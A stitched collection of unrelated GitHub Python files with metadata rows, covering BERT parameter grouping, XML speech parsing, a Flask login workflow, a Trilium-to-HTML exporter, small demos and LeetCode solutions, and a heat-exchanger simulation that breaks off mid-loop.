    layer_groups = get_param_group_for_bert(
        model, number_of_layer=number_of_layer, top_lr=top_lr, decay=decay)
    return get_layerwise_decay_param_group(layer_groups, top_lr=top_lr, decay=decay)
def get_param_group_for_bert(model, number_of_layer=12, top_lr=2e-5, decay=0.95):
    """Split a BERT model's parameters into per-layer groups.

    The result has number_of_layer + 2 buckets: the embeddings ("tail")
    first, then one bucket per transformer layer, then the head (pooler /
    norm / relative_attention_bias) last.

    Args:
        model: your BERT model.
        number_of_layer: number of transformer layers the model has.
        top_lr: unused here; kept for signature compatibility.
        decay: unused here; kept for signature compatibility.
    Returns:
        A list of parameter lists ordered tail, layer 0..N-1, head.
    """
    # NOTE(review): parameters matching none of the markers are silently
    # dropped from every bucket — confirm that is intended.
    buckets = [[] for _ in range(number_of_layer + 2)]  # tail, layer0..layerN-1, head
    head = {'pooler', 'norm', 'relative_attention_bias'}
    tail = {'embeddings',}
    layer_markers = [f'layer.{i}.' for i in range(number_of_layer)]
    for name, param in model.named_parameters():
        if belongs(name, tail):
            buckets[0].append(param)
        elif belongs(name, head):
            buckets[-1].append(param)
        else:
            for index, marker in enumerate(layer_markers):
                if marker in name:
                    buckets[index + 1].append(param)
    return buckets
def belongs(name, groups):
    """Return True when any marker in `groups` occurs as a substring of `name`."""
    return any(marker in name for marker in groups)
| PistonY/torch-toolbox | torchtoolbox/optimizer/lr_scheduler.py | lr_scheduler.py | py | 11,278 | python | en | code | 409 | github-code | 36 |
570436896 | import logging
from .geomsmesh import geompy
def sortFaces(facesToSort):
  """Sort faces by surface area, ascending.

  Returns a tuple (sorted faces, smallest area, largest area).
  """
  logging.info('start')
  keyed = []
  for index, face in enumerate(facesToSort):
    # BasicProperties returns (length, surface, volume); index 1 is the area.
    area = geompy.BasicProperties(face)[1]
    keyed.append((area, index, face))
  keyed.sort()
  facesSorted = [entry[2] for entry in keyed]
  return facesSorted, keyed[0][0], keyed[-1][0]
| luzpaz/occ-smesh | src/Tools/blocFissure/gmu/sortFaces.py | sortFaces.py | py | 362 | python | en | code | 2 | github-code | 36 |
34036030280 | # a good example of multi threading is Sending and Receiving Messages
import threading
class AndreMessenger(threading.Thread):
    """Demo thread that prints its own name ten times."""

    def run(self):
        # threading.currentThread() / getName() are deprecated aliases
        # (they emit DeprecationWarning on modern Python);
        # threading.current_thread().name is the supported spelling.
        for _ in range(10):
            print(threading.current_thread().name)
# Two demo threads run concurrently, so their printed names may interleave.
x = AndreMessenger(name = 'Send Thread')
y = AndreMessenger(name = 'Recieve Thread')  # note: "Recieve" typo is part of the runtime thread name
x.start()
y.start()
| andrevicencio21/newBoston3.0PythonTutorials | PythonNewBoston/t34Threading.py | t34Threading.py | py | 362 | python | en | code | 0 | github-code | 36 |
41047380685 | """By: Xiaochi (George) Li: github.com/XC-Li"""
import xml.etree.ElementTree as ET
from xml.etree.ElementTree import ParseError
from bs4 import BeautifulSoup
def bs_parser(file_name, target_id):
    """
    XML parser implemented with the Beautiful Soup package.

    Args:
        file_name(str): path to the document
        target_id(str): the person_id of the speaker of the target document
    Returns:
        speech(str): the speech of the speaker, fragments joined by spaces
    """
    with open(file_name, encoding='utf-8') as file:
        soup = BeautifulSoup(file, 'xml')
        fragments = []
        # A speaker may appear several times in one document; collect them all.
        for speech in soup.find_all('speaker', personId=target_id):
            # stripped_strings keeps sub-tag text as separate fragments, so
            # strings inside nested tags do not run together the way a plain
            # get_text() would merge them.
            fragments.extend(speech.stripped_strings)
    return ' '.join(fragments)
def xml_parser(file_name, target_id):
    """
    XML Parser implemented by xml package

    Args:
        file_name(str): path to the document
        target_id(str): the person_id of speaker of target document
    Returns:
        speech(str): the speech of the speaker
    """
    try:
        tree = ET.parse(file_name, ET.XMLParser(encoding='utf-8'))
        root = tree.getroot()
    except ParseError:
        # Some corpus files contain raw '&' characters that break strict XML
        # parsing; patch the text and re-parse from the string.
        # NOTE(review): this rewrites every '&' to 'and', including ones inside
        # the speech text itself — confirm that is acceptable.
        with open(file_name, encoding='utf-8') as temp:
            file_data = temp.read()
            file_data = file_data.replace('&', 'and')
            root = ET.fromstring(file_data)
    text_list = []
    for child in root[0]:
        if child.tag == 'speaker':
            if 'personId' in child.attrib:  # contain person ID
                person_id = child.attrib['personId']
            else:
                continue
            if str(person_id) != str(target_id):  # multiple speaker in a document, not target speaker
                continue
            for item in child.findall('p'):
                if len(item) == 0:
                    # NOTE(review): item.text may be None here, which would make
                    # the final ''.join raise TypeError — confirm corpus never
                    # contains empty <p/> elements.
                    text_list.append(item.text)
                else:  # multiple sub tag inside 'p' tag
                    # Interleave the text before, inside, and after each child
                    # element (ElementTree's .text/.tail split) so nothing
                    # between sub-tags is lost.
                    if item.text is not None:
                        text_list.append(item.text)
                        text_list.append(' ')
                    for i in item:
                        if i.text is not None:
                            text_list.append(i.text)
                            text_list.append(' ')
                        if i.tail is not None:
                            text_list.append(i.tail)
                            text_list.append(' ')
    return ''.join(text_list)
def xml_to_person_id(file_name):
    """
    NO LONGER USEFUL
    Collect the set of person ids appearing as speakers in an XML file.

    Args:
        file_name(str): file name
    Returns:
        person_ids(set[int]): a set of person ids
    """
    person_ids = set()
    with open(file_name, encoding='utf-8') as file:
        soup = BeautifulSoup(file, 'xml')
        for speech in soup.find_all('speaker'):
            # Speakers without a personId attribute are simply skipped.
            try:
                person_ids.add(speech['personId'])
            except KeyError:
                pass
    return person_ids
def get_person_speech_pair(file_name):
    """
    Map every speaker's person id to their concatenated speech text.

    Args:
        file_name(str): file name
    Returns:
        person_id_speech_pair(dict): Dict[person_id -> speech(str)]
    """
    speeches_by_person = {}
    with open(file_name, encoding='utf-8') as file:
        soup = BeautifulSoup(file, 'xml')
        for speech_tag in soup.find_all('speaker'):
            # The attribute was renamed across corpus versions: prefer the
            # newer 'personId', then fall back to the older 'person'.
            person_id = speech_tag.get('personId')
            if person_id is None:
                person_id = speech_tag.get('person')
            if person_id is None:
                continue
            # stripped_strings keeps sub-tag text as separate fragments.
            text = ' '.join(speech_tag.stripped_strings)
            speeches_by_person.setdefault(person_id, []).append(text)
    # Join each speaker's separate speeches into a single string.
    return {pid: ' '.join(parts) for pid, parts in speeches_by_person.items()}
if __name__ == '__main__':
    # Sample: multiple sub-tag inside p tag
    # print(xml_parser('../opinion_mining/cr_corpus/160/8/E63-E64/4407923.xml', '404'))
    # print(bs_parser('../opinion_mining/cr_corpus/160/8/E63-E64/4407923.xml', '404'))
    # Ad-hoc smoke test against a local corpus file (machine-specific path).
    print(get_person_speech_pair("D:\\Github\\FN-Research-GW-Opinion-Mining\\opinion_mining\\cr_corpus\\146\\4\\E8-E10\\27718.xml"))
| XC-Li/FiscalNote_Project | deployment/util_code/xml_parser.py | xml_parser.py | py | 5,003 | python | en | code | 1 | github-code | 36 |
41561590327 | from api.core.workflow import workflow
from flask import request
import api.DAL.data_context.admin.user_update as user_update
import api.DAL.data_context.admin.user_insert as user_insert
import api.DAL.data_context.admin.user_select as user_select
from api.core.admin.credentials import Credentials
from api.core.admin.token import Token
from api.core.admin.validate import InvalidCredential
import api.core.admin.validate as validate
import api.core.response as response
import api.core.sanitize as sanitize
import json
@workflow.route('/admin/register', methods = ['POST'])
def register_user():
    '''Register a new user account.

    Validates the submitted email, first/last name and password (see the
    individual validators for the exact rules), hashes the password before
    storage, inserts the user, then delegates to login() — which re-reads
    the same request form — so the caller is logged in immediately.
    '''
    credentials_form = json.loads(request.form['payload'])
    credentials_form = sanitize.form_keys(credentials_form)
    credentials = Credentials.map_from_form(credentials_form)
    try:
        validate.email(credentials.email)
        validate.name(credentials.first_name)
        validate.name(credentials.last_name)
        validate.password(credentials.password)
    except InvalidCredential as invalid:
        # Validators raise with a user-facing message as the first argument.
        return response.error(invalid.args[0])
    credentials.hash_password()
    user_insert.new_user(credentials)
    return login()
@workflow.route('/admin/login', methods = ['POST'])
def login():
    '''Authenticate a user from the posted form payload.

    Compares the submitted email/password against the credentials stored in
    the database; on success issues a fresh session token, persists it, and
    returns it to the client.
    '''
    credentials_form = json.loads(request.form['payload'])
    credentials_form = sanitize.form_keys(credentials_form)
    provided_credentials = Credentials.map_from_form(credentials_form)
    stored_credentials = user_select.login_credentials(provided_credentials)
    try:
        validate.login(stored_credentials, provided_credentials)
    except InvalidCredential as invalid:
        return response.error(invalid.args[0])
    # Issue and persist a fresh token for this user's session.
    token = Token()
    token.user_id = stored_credentials.id
    token.update()
    user_update.token(token)
    return response.add_token(token = token)
| RyanLadley/agility | api/core/workflow/admin_workflow.py | admin_workflow.py | py | 2,156 | python | en | code | 0 | github-code | 36 |
28513887827 | # Opus/UrbanSim urban simulation software.
# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington
# See opus_core/LICENSE
import os, sys, re
from opus_core.export_storage import ExportStorage
from opus_core.store.sql_storage import sql_storage
from opus_core.store.attribute_cache import AttributeCache
from opus_core.simulation_state import SimulationState
from opus_core.session_configuration import SessionConfiguration
from opus_core.database_management.configurations.database_server_configuration import DatabaseServerConfiguration
from opus_core.database_management.database_server import DatabaseServer
from opus_core import paths
from opus_core.strings import create_list_string
def opusRun(progressCB, logCB, params):
    """Export one or more tables from a SQL database into the OPUS attribute
    cache for a given year.

    Args:
        progressCB: callable taking a percentage (0-100) for progress updates.
        logCB: callable taking a str for log output.
        params: mapping of tool parameter names to values (see opusHelp()).
    """
    # Normalize all parameter keys and values to plain strings.
    params_dict = {}
    for key, val in params.items():  # .items() works on Python 2 and 3; iteritems() is Py2-only
        params_dict[str(key)] = str(val)

    opus_data_directory = params_dict['opus_data_directory']
    opus_data_directory = paths.prepend_opus_home_if_relative(opus_data_directory)
    opus_data_year = params_dict['opus_data_year']
    database_name = params_dict['database_name']
    table_name = params_dict['table_name']
    database_server_connection = params_dict['database_server_connection']
    overwrite = params_dict['overwrite']

    # Source: the SQL database wrapped in an OPUS sql_storage object.
    dbs_config = DatabaseServerConfiguration(database_configuration=database_server_connection)
    server = DatabaseServer(database_server_configuration = dbs_config)
    opusdb = server.get_database(database_name=database_name, create_if_doesnt_exist=False)
    input_storage = sql_storage(storage_location = opusdb)

    # Destination: the flt cache for the requested year.
    attribute_cache = AttributeCache(cache_directory=opus_data_directory)
    output_storage = attribute_cache.get_flt_storage_for_year(opus_data_year)
    SimulationState().set_current_time(opus_data_year)
    SessionConfiguration(new_instance=True,
                         package_order=[],
                         in_storage=AttributeCache())

    # 'ALL' exports every table; otherwise table_name is a space-separated list.
    if table_name == 'ALL':
        lst = input_storage.get_table_names()
    else:
        lst = re.split(' +', table_name.strip())
    tables = len(lst)
    lst_out = create_list_string(lst, ', ')
    logCB('caching tables:\n%s\n' % lst_out)
    for j, i in enumerate(lst, start=1):
        logCB("Exporting table '%s' to year %s of cache located at %s...\n" %
              (i, opus_data_year, opus_data_directory))
        try:
            ExportStorage().export_dataset(
                dataset_name = i,
                in_storage = input_storage,
                out_storage = output_storage,
                overwrite = overwrite,
                )
        except Exception:
            # Was a bare `except:` which also swallowed KeyboardInterrupt/SystemExit;
            # report the failure and continue with the next table.
            logCB('Error in exporting %s.' % i)
        progressCB(100 * j / tables)
    logCB('successfully cached tables:\n%s\n' % lst_out)
def opusHelp():
    """Return the usage text for this tool."""
    # NOTE: the original ended the string with a trailing line continuation
    # (`'...\n' \` directly before `return help`), which glued the `return`
    # statement into the expression and made the module fail to compile.
    # The local is also renamed so it no longer shadows the builtin help().
    help_text = 'This tool will get a table from a SQL database and export it to the OPUS cache format.\n' \
           '\n' \
           'opus_data_directory: path to the OPUS data directory (full path, e.g., c:\\opus\\data\\seattle_parcel\\base_year_data, or relative to OPUS_HOME)\n' \
           'opus_data_year: the year to which the data should be exported (2000)\n' \
           'database_name: the name of the database (or PostgreSQL schema) that contains the table\n' \
           'table_name: the name of the tables to be exported, separated by spaces. ALL imports all tables\n' \
           'overwrite: overwrite table if it already exists in the DB\n'
    return help_text
| psrc/urbansim | opus_gui/data_manager/run/tools/sql_data_to_opus.py | sql_data_to_opus.py | py | 3,715 | python | en | code | 4 | github-code | 36 |
4200242133 | import gevent
def eat(name):
    """Demo task: print start/end around a 2-second cooperative sleep.

    gevent.sleep yields control to other greenlets; the return value becomes
    the greenlet's .value, which the link callback reads.
    """
    print('%s start task' % name)
    gevent.sleep(2)
    print('%s end task' % name)
    return name + " finished callback"
def play(name):
    """Demo task: print start/end around a 1-second cooperative sleep.

    Finishes before eat() because its sleep is shorter; the return value
    becomes the greenlet's .value, read by the link callback.
    """
    print('%s start task' % name)
    gevent.sleep(1)
    print('%s end task' % name)
    return name + " finished callback"
def callback(greenlet):
    """Link callback: announce the finished greenlet's return value."""
    message = "callback successfully: " + greenlet.value
    print(message)
# Spawn both tasks and attach completion callbacks before waiting on them;
# joinall blocks until every greenlet has finished.
g1 = gevent.spawn(eat, 'marcia')
g1.link(callback)
g2 = gevent.spawn(play, name='joe')
g2.link(callback)
gevent.joinall([g1, g2])
print('主')
# import gevent
# from gevent import Greenlet
#
#
# def callback_func():
# print("callback successfully")
#
#
# class MyGreenlet(Greenlet):
# def __init__(self, timeout, msg):
# Greenlet.__init__(self)
# self.timeout = timeout
# self.msg = msg
#
# def _run(self):
# print("I'm from subclass of Greenlet and want to say: %s" % (self.msg,))
# gevent.sleep(self.timeout)
# print("done after sleep %s" % self.timeout)
#
#
# greenlet1 = MyGreenlet(2, 'hello')
# greenlet2 = MyGreenlet(1, 'world')
# greenlet1.start()
# greenlet2.start()
# greenlet1.rawlink(callback_func())
#
# gevent.joinall([greenlet1, greenlet2])
# print("main")
#
| Marcia0526/how_to_learn_python | coroutine/gevent_demo.py | gevent_demo.py | py | 1,215 | python | en | code | 0 | github-code | 36 |
21477660213 | # 맨 뒤에 있는 원소를 선택해서 이전에 만들어놓은 원소의 수열 갯수를 이용한다.
import sys

# Longest increasing subsequence, O(n^2) DP:
# count[i] = length of the longest increasing subsequence ending at arr[i];
# each arr[i] extends the best subsequence among earlier, smaller elements.
n = int(input())
arr = list(map(int, sys.stdin.readline().split()))
count = [1] * n
for i in range(n):
    for j in range(i):
        if arr[j] < arr[i]:
            count[i] = max(count[i], count[j] + 1)
print(max(count))
| Minsoo-Shin/jungle | week02/연습만이 살길이다!!/11053_가장긴증가하는부분수열.py | 11053_가장긴증가하는부분수열.py | py | 353 | python | ko | code | 0 | github-code | 36 |
40568525715 | import logging
from dcs.point import MovingPoint
from dcs.task import EngageTargets, EngageTargetsInZone, Targets
from game.ato.flightplans.cas import CasFlightPlan
from game.utils import nautical_miles
from .pydcswaypointbuilder import PydcsWaypointBuilder
class CasIngressBuilder(PydcsWaypointBuilder):
    """Populates the CAS ingress waypoint with an engage task.

    With a proper CAS flight plan the engagement is confined to a zone around
    the patrol track; otherwise a plain search-and-engage task is attached.
    """

    def add_tasks(self, waypoint: MovingPoint) -> None:
        target_categories = [
            Targets.All.GroundUnits.GroundVehicles,
            Targets.All.GroundUnits.AirDefence.AAA,
            Targets.All.GroundUnits.Infantry,
        ]
        flight_plan = self.flight.flight_plan
        if isinstance(flight_plan, CasFlightPlan):
            # Engage only inside the designated CAS zone, centered between
            # the patrol track's endpoints.
            layout = flight_plan.layout
            zone_center = (layout.patrol_start.position + layout.patrol_end.position) / 2
            task = EngageTargetsInZone(
                position=zone_center,
                radius=int(flight_plan.engagement_distance.meters),
                targets=target_categories,
            )
        else:
            logging.error("No CAS waypoint found. Falling back to search and engage")
            task = EngageTargets(
                max_distance=int(nautical_miles(10).meters),
                targets=target_categories,
            )
        waypoint.add_task(task)
| dcs-liberation/dcs_liberation | game/missiongenerator/aircraft/waypoints/casingress.py | casingress.py | py | 1,579 | python | en | code | 647 | github-code | 36 |
def intersect(nums1, nums2):
    """Return the multiset intersection of two lists.

    Each common element appears as many times as it occurs in both inputs,
    ordered as encountered in nums2.  Runs in O(len(nums1) + len(nums2))
    instead of the quadratic `in`/`remove` scan, and no longer mutates the
    caller's nums1 list.
    """
    from collections import Counter  # local import: this snippet has no import header
    remaining = Counter(nums1)
    result = []
    for value in nums2:
        if remaining[value] > 0:
            result.append(value)
            remaining[value] -= 1
    return result
class Solution(object):
    def intersect(self, nums1, nums2):
        """
        :type nums1: List[int]
        :type nums2: List[int]
        :rtype: List[int]
        """
        # Count occurrences in nums1, then consume the counts while scanning
        # nums2 so each shared element is emitted with the right multiplicity,
        # in nums2 order.
        counts = {}
        for value in nums1:
            counts[value] = counts.get(value, 0) + 1
        shared = []
        for value in nums2:
            if counts.get(value, 0) > 0:
                shared.append(value)
                counts[value] -= 1
        return shared
| CHENG-KAI/Leetcode | 350_interaction_of_two_array.py | 350_interaction_of_two_array.py | py | 684 | python | en | code | 0 | github-code | 36 |
35735822351 | import re
import webbrowser
import markdown
import dominate
from dominate.util import raw
from dominate.tags import *
from argparse import ArgumentParser
import shutil
import tempfile
import json
import os
from logging import *
import time
import bs4
import base64
from urllib.parse import unquote_plus
basicConfig(level="DEBUG")
class TriliumPdfExporter:
    """Converts a zipped Trilium Markdown export into one self-contained HTML
    page and opens it in the default browser (from which it can be printed or
    saved as a PDF)."""

    # Note types skipped entirely when walking the export tree.
    EXCLUDE = ["file"]

    def __init__(self, source: str, motd: str) -> None:
        """
        Args:
            source: path to the zipped Trilium export.
            motd: optional message displayed under the top-level title.
        """
        self.source: str = source
        self.motd: str = motd
        self.md = markdown.Markdown(extensions=["extra", "pymdownx.tilde"])
        # Maps suffix-path tuples (see _pathtuple) to note ids or data URIs,
        # used later to rewrite internal links.
        self.idmap = {}
        # NOTE(review): annotated str but actually holds a TemporaryDirectory
        # object once export() runs — confirm the annotation.
        self.tempdir: str = None
        self.meta = {}

    def _extract(self):
        """Unpack the source archive into a fresh temporary directory."""
        tempdir = tempfile.TemporaryDirectory()
        shutil.unpack_archive(self.source, tempdir.name)
        return tempdir

    def _pathtuple(self, path):
        """Return all suffixes of *path* joined with os.sep, longest first.

        e.g. "a/b/c" -> ("a/b/c", "b/c", "c").  Links in the export may be
        relative, so matching on any suffix lets them be resolved.
        """
        fullpath = unquote_plus(path).split(os.sep)
        pathparts = []
        while len(fullpath) > 0:
            pathparts.append(os.sep.join(fullpath))
            del fullpath[0]
        return tuple(pathparts)

    def _util_parse_meta_children(self, children: list, current: str) -> list:
        """Recursively normalize the `children` entries of !!!meta.json.

        Records each child's path in self.idmap and returns a list of
        simplified note dicts rooted at directory *current*.
        """
        out = []
        for c in children:
            if not c["type"] in self.EXCLUDE:
                if "dataFileName" in c.keys():
                    parts = self._pathtuple(
                        os.path.join(current, c["dataFileName"]))
                    self.idmap[tuple(parts)] = c["noteId"]
                out.append(
                    {
                        "title": c["title"],
                        "id": c["noteId"],
                        "type": c["type"],
                        "mime": c["mime"] if "mime" in c.keys() else None,
                        "source": c["dataFileName"]
                        if "dataFileName" in c.keys()
                        else None,
                        "path": c["dirFileName"] if "dirFileName" in c.keys() else None,
                        "content": None,
                        "children": self._util_parse_meta_children(
                            c["children"],
                            os.path.join(
                                current,
                                c["dirFileName"] if "dirFileName" in c.keys() else "",
                            ),
                        )
                        if "children" in c.keys()
                        else [],
                    }
                )
        return out

    def _analyze_metadata(self):
        """Load !!!meta.json from the extracted archive and build the note tree.

        Exits the process when the metadata file is missing or malformed.
        """
        if not os.path.exists(os.path.join(self.tempdir.name, "!!!meta.json")):
            critical("Failed to load: !!!meta.json file missing.")
            exit(0)
        with open(os.path.join(self.tempdir.name, "!!!meta.json"), "r") as f:
            try:
                raw = json.load(f)
            except:
                critical("Failed to load: !!!meta.json is bad JSON")
                exit(0)
        self.idmap[("",)] = "root"
        # Synthetic root node that holds the whole export as its children.
        out = {
            "title": f"Exported Notes: {time.strftime('%m / %d / %Y')}",
            "id": "root",
            "type": "book",
            "mime": None,
            "source": None,
            "path": "",
            "content": None,
            "children": self._util_parse_meta_children(raw["files"], ""),
        }
        return out

    def _convert_to_html(self, item: dict, current: str, top: bool = False) -> str:
        """Render one note dict (and, recursively, its children) to a dominate div.

        Markdown notes are converted to HTML, canvas notes become inline SVG
        images, and all other files are embedded as base64 data URIs.
        """
        if top:
            content = div(self.motd if self.motd else "",
                          _class="note-content")
        else:
            content = ""
        if item["source"]:
            if item["source"].endswith(".md"):
                with open(
                    os.path.join(self.tempdir.name, current,
                                 item["source"]), "r"
                ) as f:
                    debug(f"Parsing {item['source']}")
                    # Normalize escaped math delimiters to $...$ and double up
                    # single tildes so pymdownx.tilde renders strikethroughs.
                    raw_md = f.read().replace("\\\\(", "$").replace("\\\\)", "$")
                    for k in re.findall("~.*?~", raw_md):
                        raw_md = raw_md.replace(k, "~" + k + "~")
                    content = div(
                        raw(
                            self.md.convert(
                                raw_md,
                            ).replace("h1", "h5")
                        ),
                        _class="note-content",
                    )
                    item["content"] = content
            elif item["type"] == "canvas":
                with open(os.path.join(self.tempdir.name, current, item["source"]), "r") as f:
                    debug(f"Parsing canvase {item['source']}")
                    # Canvas exports store a rendered SVG in their JSON payload.
                    svg = json.load(f)["svg"]
                    content = div(img(
                        src=f"data:image/svg+xml;base64,{base64.b64encode(svg.encode('utf-8')).decode('utf-8')}",
                        _class="svg"
                    ),
                        _class="note-content note-svg"
                    )
                    item["content"] = content
            else:
                # Binary attachment: embed as a data URI and index it in idmap
                # so <img> references can be rewritten later.
                with open(
                    os.path.join(self.tempdir.name, current,
                                 item["source"]), "rb"
                ) as f:
                    item["content"] = "data:{};base64,{}".format(
                        item["mime"] if item["mime"] else "text/plain",
                        base64.b64encode(f.read()).decode("utf-8"),
                    )
                    self.idmap[
                        self._pathtuple(os.path.join(
                            current, item["source"]))
                    ] = item["content"]
        head = div(
            h2(item["title"]) if item["type"] == "book" else h4(item["title"]),
            _class="note-header",
            id=item["id"],
        )
        children = div(_class="note-children")
        for c in item["children"]:
            try:
                children += self._convert_to_html(
                    c, os.path.join(
                        current, item["path"] if item["path"] else "")
                )
            except ValueError:
                warning("Experienced tag creation error, skipping")
        return div(head, content, children, _class="note")

    def _generate_html(self):
        """Build the full dominate document: KaTeX assets, inline CSS, all notes."""
        document = dominate.document(
            title=f"Exported Notes: {time.strftime('%m / %d / %Y')}"
        )
        with document.head:
            link(
                rel="stylesheet",
                href="https://cdn.jsdelivr.net/npm/katex@0.16.0/dist/katex.min.css",
                integrity="sha384-Xi8rHCmBmhbuyyhbI88391ZKP2dmfnOl4rT9ZfRI7mLTdk1wblIUnrIq35nqwEvC",
                crossorigin="anonymous",
            )
            script(
                defer=True,
                src="https://cdn.jsdelivr.net/npm/katex@0.16.0/dist/katex.min.js",
                integrity="sha384-X/XCfMm41VSsqRNQgDerQczD69XqmjOOOwYQvr/uuC+j4OPoNhVgjdGFwhvN02Ja",
                crossorigin="anonymous",
            )
            script(
                defer=True,
                src="https://cdn.jsdelivr.net/npm/katex@0.16.0/dist/contrib/auto-render.min.js",
                integrity="sha384-+XBljXPPiv+OzfbB3cVmLHf4hdUFHlWNZN5spNQ7rmHTXpd7WvJum6fIACpNNfIR",
                crossorigin="anonymous",
                onload="console.log(renderMathInElement(document.body, {delimiters: [{left: '$', right: '$', display: false}]}));",
            )
            style(
                """
                .note-children {
                    padding-left: 8px;
                    border-left: 2px solid #dddddd;
                }
                img {
                    display: block;
                }
                .note-content.note-svg {
                    display: block;
                    width: 90%;
                    height: auto;
                    box-sizing: border-box;
                    padding: 8px;
                    border: 2px solid #dddddd;
                    margin-left: 4px;
                    background-color: white;
                }
                .note-content.note-svg img {
                    display: inline-block;
                    height: auto;
                    width: 100%;
                }
                """
            )
        document += self._convert_to_html(self.meta, "", top=True)
        return document

    def _resolve_link(self, path):
        """Collapse '..' segments in relative links; pass absolute URLs through."""
        if not re.match("^[a-z]*?://.*", path):
            path = os.path.join(
                *[i for i in path.split(os.sep) if not i == ".."])
            return path
        else:
            return path

    def _resolve_links(self):
        """Rewrite <a href> and <img src> targets to in-page anchors / data URIs."""
        soup = bs4.BeautifulSoup(self.doc, "html.parser")
        for l in soup.find_all("a"):
            if re.match("^[a-z]*?://.*", l["href"]):
                continue
            lnk = self._resolve_link(unquote_plus(l["href"]))
            key = self._pathtuple(lnk)
            # Default to the document root; overwritten when a match is found.
            # NOTE(review): `any` matches on partial suffix overlap, so an
            # ambiguous path ends up pointing at the last overlapping idmap
            # entry — confirm this is acceptable.
            l["href"] = "#root"
            for k in self.idmap.keys():
                if any([x in k for x in key]):
                    l["href"] = "#" + self.idmap[k]
        for i in soup.find_all("img"):
            if re.match("^[a-z]*?://.*", i["src"]) or i["src"].startswith("data:"):
                continue
            lnk = self._resolve_link(unquote_plus(i["src"]))
            key = self._pathtuple(lnk)
            i["src"] = ""
            for k in self.idmap.keys():
                if any([x in k for x in key]):
                    i["src"] = self.idmap[k]
        return str(soup)

    def export(self, preserve=False) -> str:
        """Run the full pipeline: extract, parse, render, open in the browser.

        Args:
            preserve: when False, the source zip is deleted afterwards.
        """
        info("Extracting zip file into temporary directory...")
        self.tempdir = self._extract()
        info("Analyzing export metadata")
        self.meta = self._analyze_metadata()
        self.doc = self._generate_html().render()
        self.doc = self._resolve_links()
        with tempfile.NamedTemporaryFile("r+", suffix=".html") as f:
            f.write(self.doc)
            f.flush()
            webbrowser.open(f"file://{f.name}")
            # Give the browser a moment to load before the temp file vanishes.
            time.sleep(1)
        info("Cleaning up...")
        self.tempdir.cleanup()
        if not preserve:
            os.remove(self.source)
if __name__ == "__main__":
    # Command-line entry point: parse arguments and run the exporter.
    cli = ArgumentParser(
        description="Parse a compressed MD export of Trilium notes, then convert to a web page for easy download"
    )
    cli.add_argument(
        "source", metavar="S", type=str, help="Path to source .zip file."
    )
    cli.add_argument(
        "-p",
        "--preserve",
        help="Whether to preserve the source zip file. Defaults to false.",
        action="store_true",
    )
    cli.add_argument(
        "-m",
        "--motd",
        type=str,
        help="Message to display under main title",
        default=None,
    )
    options = cli.parse_args()
    TriliumPdfExporter(options.source, options.motd).export(preserve=options.preserve)
| iTecAI/trilium-tools | pdf-export/trilium_to_pdf.py | trilium_to_pdf.py | py | 11,045 | python | en | code | 2 | github-code | 36 |
4472644976 | import pygame as pg
from gui.widgets.animated_widget import AnimatedWidget
from data.constants import *
class BackgroundImage(AnimatedWidget):
    """Static background picture that fades in and out with menu animations."""
    def __init__(self, x, y, w, h, image):
        """Load `image` from disk and scale it to (w, h); drawn at (x, y)."""
        super().__init__()
        self.pos = x, y
        self.image = pg.transform.smoothscale(pg.image.load(image).convert_alpha(), (w, h))
    def update(self, dt, animation_state=WAIT, time_elapsed=0.0):
        """Adjust alpha: fully opaque at WAIT, fading in/out during OPEN/CLOSE.

        `time_elapsed` is the animation progress in [0, 1]; `dt` is unused here.
        """
        if animation_state == WAIT and self.image.get_alpha() !=255:
            self.image.set_alpha(255)
        elif animation_state == OPEN:
            self.image.set_alpha(round(255 * time_elapsed))
        elif animation_state == CLOSE:
            self.image.set_alpha(round(255 * (1 - time_elapsed)))
    def draw(self, screen, animation_state=WAIT):
        """Blit the (possibly faded) image onto `screen` at the stored position."""
        screen.blit(self.image, self.pos)
__all__ = ["BackgroundImage"]
| IldarRyabkov/BubbleTanks2 | src/gui/widgets/background_image.py | background_image.py | py | 834 | python | en | code | 37 | github-code | 36 |
5967270915 | # Sun Oct 27 15:40:29 2019
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
# Configurations
mpl.rcParams['font.family'] = 'serif'
mpl.rcParams['font.size'] = 20
mpl.rcParams['font.weight'] = 'medium'
mpl.rcParams['font.style'] = 'normal'
mpl.rcParams['font.serif'] = 'DejaVu Serif'
mpl.rcParams['mathtext.fontset'] = 'stix'
mpl.rcParams['mathtext.fallback_to_cm'] = True
mpl.rcParams['lines.linewidth'] = 2
mpl.rcParams['savefig.dpi'] = 300
mpl.rcParams['savefig.bbox'] = 'tight'
###################### thermophysical prop ##################
cL = 4183.0
cS = 700.0
rhoL = 994.0 # kg/m3
rhoS = 7850.0 # kg/m3
h = 12000.0 # W/m2 K
kappaL = 0.682
kappaS = 1.3
###################### constants ############################
TH0 = 45
TC0 = 10
Ri = 0.05 # inner radius
Rs = 0.06
Ro = 0.08 # outer radius
pi = np.pi
Ac = pi * Ri**2
As = pi * Rs**2 - Ac
Ah = pi * Ro**2 - pi * Rs**2
L = 6.0 # length
S1 = L * pi * 2 * Rs
S2 = L * pi * 2 * Ri
uh = 0.3
uc = 0.3
Qh = uh * Ah
Qc = uc * Ac
dt = 0.01
t = np.arange(0, 200+dt, dt)
Th2 = np.zeros(len(t))
Tc2 = np.zeros(len(t))
Th2[0] = TH0
Tc2[0] = TC0
nx = 50
dx = L / nx
x = np.arange(dx/2, L+dx/2, dx)
TH = np.zeros(nx)
TS = np.zeros(nx)
TC = np.zeros(nx)
TH[:] = TH0
TS[:] = 0.5 * (TH0 + TC0)
TC[:] = TC0
TH_prev = TH.copy()
TS_prev = TS.copy()
TC_prev = TC.copy()
Th1 = np.zeros(len(t))
Tc1 = np.zeros(len(t))
Th1[:] = TH0
Tc1[:] = TC0
idx = int(100/dt)
Th1[idx::] = TH0 + 10
Tc1[idx::] = TC0
Si1 = S1 / nx
Si2 = S2 / nx
# Explicit (forward-Euler) time march of three coupled 1-D energy balances:
# hot stream TH, separating wall TS, cold stream TC.  The cold stream is
# stored in its own flow direction, so counter-flow coupling pairs node ix
# of the wall with node nx-ix-1 of the cold stream (and vice versa).
for it in range(len(t)-1):
    # --- inlet nodes (ix == 0): upwind advection from the inlet temperature ---
    rhs = Qh * cL * rhoL * (Th1[it] - TH_prev[0]) - h * Si1 * (TH_prev[0] - TS_prev[0])
    rhs = rhs - kappaL * Ah * (TH_prev[0] - TH_prev[1]) / dx
    temp = rhs * dt / (cL * rhoL * Ah * dx)
    TH[0] = TH_prev[0] + temp
    rhs = h * Si1 * (TH_prev[0] - TS_prev[0]) - h * Si2 * (TS_prev[0] - TC_prev[-1])
